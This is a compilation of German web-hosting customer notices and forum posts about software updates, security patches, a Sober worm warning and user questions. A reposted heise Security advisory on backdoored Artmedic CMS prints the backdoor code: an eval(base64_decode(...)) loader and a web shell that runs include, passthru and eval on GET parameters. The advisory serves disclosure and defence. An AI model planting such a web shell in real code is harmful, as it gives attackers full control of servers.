Sehr geehrte ok-webhosting Kunden,

ImageMagick wurde auf sämtlichen Systemen auf die Version 6.3.4 gebracht.
Der Pfad zu ImageMagick lautet unverändert /usr/local/bin

Interreseierte Kunden finden hier das vollständige Changelog

Sehr geehrte ok-webhosting Kunden,

auf sämtlichen Serversystemen wurde ein Update von PHP 5.2.2 auf PHP Version 5.2.3 durchgeführt.

Mit der neuen PHP-Version 5.2.3 wurden mehrere sicherheitsrelevante Schwachstellen behoben.

Die Release-Notes umfassen unter anderem die Behebung eines Integer-Überlaufs in der Funktion chunk_split() und einer Ausbruchsmöglichkeit für die Pfadrestriktionen des Safe-Mode durch einen Fehler in der Funktion realpath() sowie die Schließung einer Lücke in der Funktion imagecreatefrompng().

Bei zwei Bugfixes – einer im Timeout-Handling von SSL-Verbindungen und einer im Zusammenhang mit fehlenden HTTP_RAW_POST-Daten – handelt es sich um Nachbesserungen von Patches in der Vorgängerversion 5.2.2.

Für alle Interessierten findet sich das Changelog unter
http://www.php.net/ChangeLog-5.php#5.2.3

Hallo auch.

Ich habe in einem Paket 2 Domains gebucht. Beide Domains, verweisen auf unterschiedliche Startseiten (Unterverzeichnisse). Kann ich die Statistikfunktion so einrichten, das ich eine getrennte Statistik für jede Domain bekommen kann ?

Guten Abend,
ich wollte mal fragen wie es aussieht ob man den Domainnamen ändern lassen kann?
Ich wäre auch bereit wieder Geld zu zahlen. Allerdings nicht wieder für das halbe Jahr.
Ich bitte um Antwort.
Ich wollte meine Homepage: www.tagclan.de
in: www.german-dreamz.de ändern!
Falls möglich können Sie sich mit mir auch per icq in Kontakt setzen.
icq: 289161161

Mfg
Nooblike

Im Code des Content Management Systems Artmedic sind mehrere Hintertüren versteckt, über die ein Angreifer den Server komprimitieren und komplett übernehmen kann. Darüber hinaus versendet das Setup-Skript eine E-Mail mit dem Namen des unterminierten Servers an eine Adresse in Russland.

An mindestens drei Stellen enthält der PHP-Code des CMS offenbar nachträglich eingefügte Statements der Form:

$template1 = 'aWYoJF9HR...';
eval(base64_decode($template1));

Das entpackt die kryptische, base64-kodierte Zeichenkette zunächst und führt die so erhaltenen Befehle dann via eval aus.

if($_GET['include']) include($_GET['include']);
if($_GET['cmd']) passthru($_GET['cmd']);
if($_GET['php']) eval($_GET['php']);

Dieser PHP-Code wertet die GET-Parameter include, cmd und php aus. Damit kann ein Angreifer durch den Aufruf spezieller URLs eigenen Code einschleusen und beliebige Befehle auf dem Server starten.

Die fraglichen Dateien sind zumindest in der aktuell zum Download angebotenen Version 3.4 enthalten und tragen ein Datum vom 2. Mai, das jedoch auch manipuliert sein könnte. Die Anbieter von Artmedic haben bislang auf Nachfragen von heise Security nicht geantwortet. Wer eine Site mit Artmedic betreibt, sollte diese sofort offline nehmen und den Server genauestens auf Hinterlassenschaften unerwünschter Besucher untersuchen.

Quelle: heise.de

[/b]

Sehr geehrte ok-webhosting Kunden,

der Zend Optimizer wurde auf die neuste Version 3.2.8 upgedatet.
Gegenüber der Version 3.2.6 wurden wiederum einige Fehler behoben.

Durch Zend Optimizer werden PHP-Scripte auf dem Server zum Teil
bis zu 40 % schneller ausgeführt! Außerdem lassen sich Zend-Guard codierte Dateien ausführen.

Interessierte Kunden finden weitere Informationen auf den Seiten des Anbieters unter http://www.zend.com/de/products/zend_optimizer

Sehr geehrte ok-webhosting Kunden,

der Webmailer SquirrelMail wurde auf die Version 1.4.10a gebracht.

Die neue Version enthält ein Sicherheitsfixes, da für die Vorgängerversion eine Schwachstelle bekannt wurde, ueber die Angreifer unter bestimmten Voraussetzungen Cross-Site-Scripting-Angriffe durchfuehren konnten.

Das aktuelle Update für den Internet Explorer schließt insgesamt sechs Sicherheitslücken.

Die Lücken könnten ausgenutzt werden, um unbemerkt Schadprogramme auf dem Computer auszuführen sofern der Nutzer eine speziell präparierte Webseite aufruft.

Nutzern des Internet Explorer wird dringend geraten möglichst umgehend das aktuelle Windows-Update, das die Schwachstellen im Internet Explorer schließt [MS07-027, KB931768] zu installieren.

Derzeit scheint der Mail-Wurm Sober wieder aktiv zu sein.

Zwar ist der Mail-Strom diesbezüglich im Gegensatz zum Jahr 2005 derzeit noch verhalten, Sie sollten dennoch Vorsicht walten lassen

Entsprechende eMails enthalten einen Schädling im Form eines gezippten Anhangs und kündigen derzeit eine Passwörtänderung ("Ihr Passwort wurde geaendert!"), eine Kontoeinrichtung ("Ihr Account wurde eingerichtet!") oder einen Übertragungsfehler ("Fehlerhafte Mailzustellung") an. Die Absender sind gefälscht und geben vor, dass die Nachricht von Microsoft stamme.

Derzeit erkennen offensichtlich bislang lediglich AntiVir, Avast und F-Prot den Schädling als Sober.AT wobei die dürftige Erkennung auch darauf zurückzuführen sein dürfte, dass offenbar viele Mails nur defekte Anhänge mit sich tragen.

Von heise Security untersuchte Exemplare ließen sich entweder nicht aus dem Archiv entpacken oder unter Windows nicht starten. Andere Berichte deuten jedoch darauf hin, dass durchaus funktionierende Exemplare im Netz unterwegs sind. Diese werden offenbar aber von vielen Virenscannern bereits erkannt.

Dennoch sollten Anwender beim Empfang von Mails mit daran angehängten Dateien vorsichtig sein und im Zweifel die Mail löschen.

Außerdem sollten Sie derzeit verstärkt darauf achten, Ihre Virensignaturen aktuell zu halten.

Hallo auch...

Ich verwende zahlreiche Formulare mit Textareas. Der Inhalt dieser Textareas wird in der MySQL Datenbank gespeichert. In vielen Fällen gibt es dort auch einen Zeilenumbruch. Wird der Inhalt nun per mail() Funktion von PHP verschickt, so kommt es zu einem doppelten Zeilenumbruch.

Diesen Effekt habe ich bei meinem lokalen Server nicht, dort wird der Inhalt der Textarea so verschickt, wie er eingegeben wurde. Bei selbstgeschriebenen Scripten ist das nicht das Problem, lästig ist es allerdings bei fertigen Scripten wie phpBB2, dort wird in meinem Fall der über das Admincenter eingestellte Footer ziemlich verunstaltet. In selbstgeschriebenen Scripten habe ich erstmal folgendes erfolgreich probiert um dem Problem Herr zu werden:

$text = str_replace("\r","",$text);

Das entfernt das \r Zeichen, da es aber noch ein \n gibt, habe ich wie gehofft nur einen normalen Zeilenumbruch.

Kann man das an der php.ini einstellen oder an anderen Servereinstellungen ?